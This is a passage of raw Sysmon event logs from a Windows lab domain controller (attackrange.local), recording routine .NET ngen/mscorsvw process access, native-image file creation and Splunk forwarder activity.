21:06:34.838{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.838{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.822{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A5FFC1508D45BCA57992DBD32ECD604,SHA256=4D25A9FD095A7A11BA6448AD3F23DC56F796BE0D3B662869F10E794A6F81206D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.791{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25A-60D3-E004-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.775{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25A-60D3-E004-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.775{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25A-60D3-E004-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:34.666{4DB9351A-A259-60D3-DF04-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1108-0\System.Web.Mobile.dll2021-06-23 21:06:34.666 23542300x800000000000000022102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.572{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40ECC7016E0B5F9D1254AD48A7B17974,SHA256=2AA86FA0CB03150BBD62B5480984795B167EB86A9BFF691E19391F8C3DA1F21C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.221{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61452-false10.0.1.12-8000- 23542300x800000000000000022125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.603{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CC078E510667E37488D33D715999A62,SHA256=09E7237428A2728C8D7139347EDD73A22415DF2F67DDF4B26FE77F62B8790301,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.416{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.416{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.260{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E404-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.244{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E404-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.244{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E404-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:35.197{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15d0-0\System.Web.Routing.dll2021-06-23 21:06:35.197 10341000x800000000000000022117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.166{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.150{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.057{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E204-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.041{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E204-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.041{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E204-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.619{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA51CB89AAFB01C3C7D2C03D817F2683,SHA256=7B8C1E878C71B03F2D5C1F50175E7031259C5F7C37E462427727B026A86E63E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.525{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.510{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.510{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.416{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25C-60D3-E604-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\S